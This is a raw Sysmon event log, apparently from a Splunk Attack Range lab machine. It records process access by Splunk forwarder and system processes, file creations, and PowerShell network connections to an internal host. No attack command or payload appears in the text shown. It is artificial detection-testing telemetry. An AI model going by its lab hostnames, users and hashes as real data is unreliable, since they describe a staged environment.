Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56576-false10.0.1.12-8000- 23542300x800000000000000035084193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B52E349A8AE58FCE1710482144C04E30,SHA256=C435CF38FFB761E109B681F1DF9FC131CF19AC0CB68959D501884F3413BA8B69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C06DDBEE5A4D8FC1998F34FDE6C75220,SHA256=AF53D9D55F6D092FDF1734B40846FCE1E47CC772B97168F9F70E41AA01918093,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.180{B81B27B7-4DD9-613A-3190-03000000C801}19884052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.031{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DD9-613A-3190-03000000C801}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.029{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.029{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.029{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.029{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4DD9-613A-3190-03000000C801}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.029{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.028{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DD9-613A-3190-03000000C801}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.012{B81B27B7-4DD9-613A-3190-03000000C801}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:30.928{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1245A9D3C63519F34F59827F2D43731A,SHA256=C37856B3B6899B2D8D9603FD48B930F8D0E3BB6BD3F095F5C2CF9827DF842622,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:31.946{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF717e50f7.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:31.946{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC9451F7D0D1A2926A90645F596869C3,SHA256=CDB7A14E3C39FDA505DB8BABC77E9D897F11A7B865EFA0735D4C390CA4B879CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:31.777{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F5E7786B0D360C92CBF1361D2C2C2563,SHA256=D2659E11BE98805DE0A4CF8437D59065004DA15842CB82C5A9D5B5BA41A234A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:32.976{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2C98EBCDA2870E0F1E6E5B013FAF9E0,SHA256=F8743C34EF0E777E82416D91A6E851FE7CA462B428501A6663C1580B7C81AAEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:56.764{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56577-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035084203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.092{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56578-false10.0.1.12-8000- 23542300x800000000000000035084202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:34.006{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9C265CDBA324CA2631A443232A138D4,SHA256=CAE540C7226281B0B45A419F58191B7C5C85206C1D374ABD650F8262F1645F6F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:35.026{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=330C70C5108AFE92BD06F3426480258C,SHA256=6B007DAE2A917DFDDC46A39BE290BF36ABCB630230B20AC6A65EE43B259843D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:36.393{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=592283C54DF36EDDE75570D1770914BA,SHA256=D18E8C94B2C9648CED2EDD858E8EA7D8E503C4F085F3E978A5D504D565E1335C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:36.044{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC90539736E7A412B2BAE08D7745E71A,SHA256=64D1F40DBB63C9FDA7670A37285079FD63B29F6AFF7775E280446500738F320F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:37.925{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E6776F7BE6C385E0A3A34A8D69E92D3E,SHA256=DA896F45F5686D1522C4D901AD9ABF868BA224D57DBB4BE0FE3AC82FF8A8B46F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:37.045{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7CFA844CAEC4C8E98D4CAAA98B058F9,SHA256=E639627F55BEE7974E10CB43CCB9BFEFFC1D7866AA4F288C4A9A81CC91BC63F4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:02.786{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56579-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:38.391{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:38.391{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=0B43B43A3A3C18A001D0AE957A380828,SHA256=DA01823A612AC8ED65010DDD629986F9157113A31F94185858212BA3D9468D3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:38.075{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBB22ECF6AB23CC36E771D5813829544,SHA256=21CAD4F052F9D70854FEF69AED820C65CB31A32B22B34D4674B11FD4E01BFAC9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:39.090{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F395E916797AB917AC6F5A58B80480F5,SHA256=A320825B477383CCEFD53DAC41F558BCBA344477DBFA8F7606FADF19BD934673,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:04.192{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56580-false10.0.1.12-8000- 23542300x800000000000000035084214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:40.105{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE5AE6417DA4373FF0EC84DCF3C060D2,SHA256=2972B3B85463F1D13463074A19F4E24DC7BE73D7EF91AB8C1DC9ABB3B498B8C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:41.158{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4429ABA09DE0A9550987223D2AE74BCA,SHA256=D21667AE512A4607226074FBD7BEA8A0A7FB9A836E422448332B5959D3275263,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:42.158{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD8BDC0722A3BCFDC3E5C74B6A3B3C0,SHA256=0DA1372DCD359B40159434A173892024FA8DF1F0D0F1FAA457070B7F15EA0749,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.804{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A6D6A5489D1CBBD641119C4E6C04AF7E,SHA256=3C6E2D21DDE9AF865054A700D122EA3C4C3C7C73934A159D8DAAB34E736AD47B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.673{B81B27B7-4DE7-613A-3290-03000000C801}64283952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.525{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DE7-613A-3290-03000000C801}6428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.522{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.522{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.522{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 